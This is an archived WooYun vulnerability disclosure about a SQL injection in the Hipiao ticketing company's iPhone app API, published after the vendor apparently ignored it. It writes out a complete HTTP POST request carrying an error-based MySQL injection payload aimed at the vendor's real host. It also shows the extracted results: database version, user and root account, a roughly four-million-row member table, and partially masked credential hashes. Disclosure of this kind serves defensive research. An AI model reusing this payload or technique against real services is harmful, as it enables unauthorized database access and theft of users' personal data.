当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-049178

漏洞标题:哈票网iphone手机端app存在注射漏洞400W会员受到威胁

相关厂商:哈票网

漏洞作者: 孤狐浪子

提交时间:2014-01-17 17:43

修复时间:2014-03-03 17:44

公开时间:2014-03-03 17:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-03-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

哈票网iphone手机端APP应用存在注入漏洞,可导致用户信息被泄露,服务器受到严重安全隐患。

详细说明:

POST /iphonehall/iphonehalla.php?plantid=cc9bb621-7f43-11e3-b6b6-001bb97ef1a4@@4'+and(select+1+from(select+count(*),concat(0x20,mid((concat((concat_ws(0x7b257d,version(),database(),user(),CURRENT_USER)),0x69)),1,64),floor(rand(0)*2))from+information_schema.tables+group+by+2)a)--+ HTTP/1.1
Host: open.hipiao.com:8000
Proxy-Connection: keep-alive
Accept-Encoding: gzip
Content-Type: text/xml;charset=utf-8
Accept-Language: zh-cn
Accept: */*
Content-Length: 0
Connection: keep-alive
Encoding: utf-8
User-Agent: HiPiao/1.3.2 CFNetwork/672.0.8 Darwin/14.0.0


以上plantid参数存在注入,此连接还可以绕过用户后台登录进行查询,过滤不严格,此注入点使用MYSQL数据ROOT权限,可进行更多方式进行渗透测试。
注: 以上手机端只是进行了简单的安全测试,漏洞利用只简单进行了测试,没有进行深入,点到为止。

漏洞证明:

显示版本号
5.0.45-log{%}hipiao{%}[email protected]{%}[email protected]
hipiao HP_MEMxxxxx_INFO 4080220 用户信息数量。
[email protected] 7cfb53xxxxxxxxxxxxba663ad3d
root*AEB5DFEE383XXXXXXXXXX28C8ECC382DF71IDC-D-5568 mysql用户密码HASH和用户名
Warning: mysql_connect() [function.mysql-connect]: php_network_getaddresses: getaddrinfo failed: in /var/www/html/xxxxxxx/mysql.lib.php on line 27
Warning: mysql_select_db() [function.mysql-select-db]: Access denied for user 'root'@'localhost' (using password: NO) in /var/xxxx/html/xxxxx/mysql.lib.php on line 29
Warning: mysql_select_db() [function.mysql-select-db]: A link to the server could not be established in /var/www/html/xxxxx/mysql.lib.php on line 29
注部分敏感信息使用 xxxxxx打码。

修复方案:

过滤一个,管理员在仔细检查一下APP端其它调用接口。求礼物 ^-^

版权声明:转载请注明来源 孤狐浪子@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝